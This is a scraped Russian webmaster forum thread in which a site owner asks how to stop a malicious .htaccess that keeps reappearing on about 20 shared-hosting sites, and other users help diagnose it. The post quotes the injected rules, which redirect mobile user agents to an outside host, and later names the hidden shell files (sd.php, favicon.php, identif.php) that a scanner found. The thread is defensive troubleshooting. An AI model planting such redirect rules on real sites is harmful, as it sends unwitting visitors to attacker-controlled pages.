Если у вас такой же тип, то удалите файл индекса каждого из 25 сайтов - Хостинг и серверы для сайтов

Вредоносный .htaccess как избавиться от заразы ?

vaf76 · 2012-09-12T07:58:58.0000000Z

Добрый день. У меня следующая проблема. На всех сайтах моего хостера (все сайты на одном аккаунте их около 20) регулярно подменяется .htaccess на вредоносный, такого вида. RewriteEngine on RewriteCond %{HTTP_USER_AGENT} android [NC,OR] RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR] RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR] ... тут еще много всего перечислено .. RewriteRule ^(.*)$ http://httpupd.com/s/4087 [L,R=302] Притом это не зависит от движка сайта (Joomla, Wordpress или голый HTML), меняется даже там где всего лишь один единственный index.html Обратился к хостеру, посоветовали поменять пароли и закрыть доступ по ftp Предпринимаемые действия: изменил пароль на ftp, изменил пароль входа в админ панель хостера, изменил пароль для доступа к MySQL. Ситуация не поменялась. Вообще полностью закрыл доступ к ftp, проблема не исчезла. Менял права на .htaccess, всем дольно на чтение, не помогло. Просматривал скрипты на наличие iframe, левых ява скриптов, все чисто. Подскажите, какие еще действия можно предпринять ? Заранее спасибо.

223

bugsmoran

12 сентября 2012, 16:08

#21

хабиб:
Кто может помочь найти шел и все пакости, что с ним связано?

Я Вам еще раз говорю: покажите файл index.php. Вирус там. Я его уже миллион раз видел.

135

хабиб

12 сентября 2012, 16:09

#22

файл индекс каждого из 25 сайтов?

хостинговый хостинг (http://www.ihc.ru/?ref=7589)

334

TF-Studio

12 сентября 2012, 17:13

#23

есть очень много способов аналогичное залить.

Всё ещё лучший способ заработка для белых сайтов: GoGetLinks (https://www.gogetlinks.net/?inv=fahbn8).

273

XAHTOB

12 сентября 2012, 17:49

#24

я хостера сменил - и все норм. где была причина - не знаю.

всем кто окончил школу жизни вручают мраморный диплом ©

V7

136

vaf76

13 сентября 2012, 05:37

#25

Вчера перенес два сайта на другой аккаунт этого же хостера, на тех 2х сайтах проблема исчезла.

---------- Добавлено 13.09.2012 в 09:48 ----------

В общем то вредоносные скрипты нашел, удалил. Спасибо ai-bolit.php

---------- Добавлено 13.09.2012 в 10:39 ----------

Зараза сидела не в индексном файле, а в отдельном скрипте. Если у вас такой же тип как и у меня, то левые файлы назывались sd.php, favicon.php, находились в папке с изображениями

таж же был файл identif.php

Кому нужно, могу прислать для изучения.

Кто вычистит ftp от Переход с шаред хостинга Прошу помощи Mal/Iframe-AN

M

65

mvolgin

13 сентября 2012, 07:36

#26

а на папке с имиджами было 777 ?

________________________ я больше не хостер ....

V7

136

vaf76

13 сентября 2012, 09:49

#27

mvolgin:
а на папке с имиджами было 777 ?

было 755, 755 и осталось

334

TF-Studio

13 сентября 2012, 12:08

#28

Удаление шелла - это только часть небольшая.

Нужно ещё и дыру прикрыть, иначе будут лить постоянно.

E

68

errora

13 сентября 2012, 12:30

#29

vaf76, сайты на каких движках преимущественно? Та же беда периодами накатывает, толи через вордпресс пролезла (там плагин "GSM" "самоустановился"), толи через DLE (и после удаления и полной чистки продолжают пролезать, причем на сайте на этом движке файлики .htacces появляются на секунды раньше, чем на остальных).

Все совпадения случайны, имена и даты высосаны из пальца и значения не имеют.

Пропали переключатели страниц на Вирус на сайте. Как Не работает "Удаление" и

M

65

mvolgin

13 сентября 2012, 13:12

#30

vaf76:
было 755, 755 и осталось

Тогда эффект будет недолгим.

Как удалить плохие SEO-ссылки и очистить ссылочную массу сайта

Курс биткоина превысил $50 тысяч

Вредоносный .htaccess как избавиться от заразы ?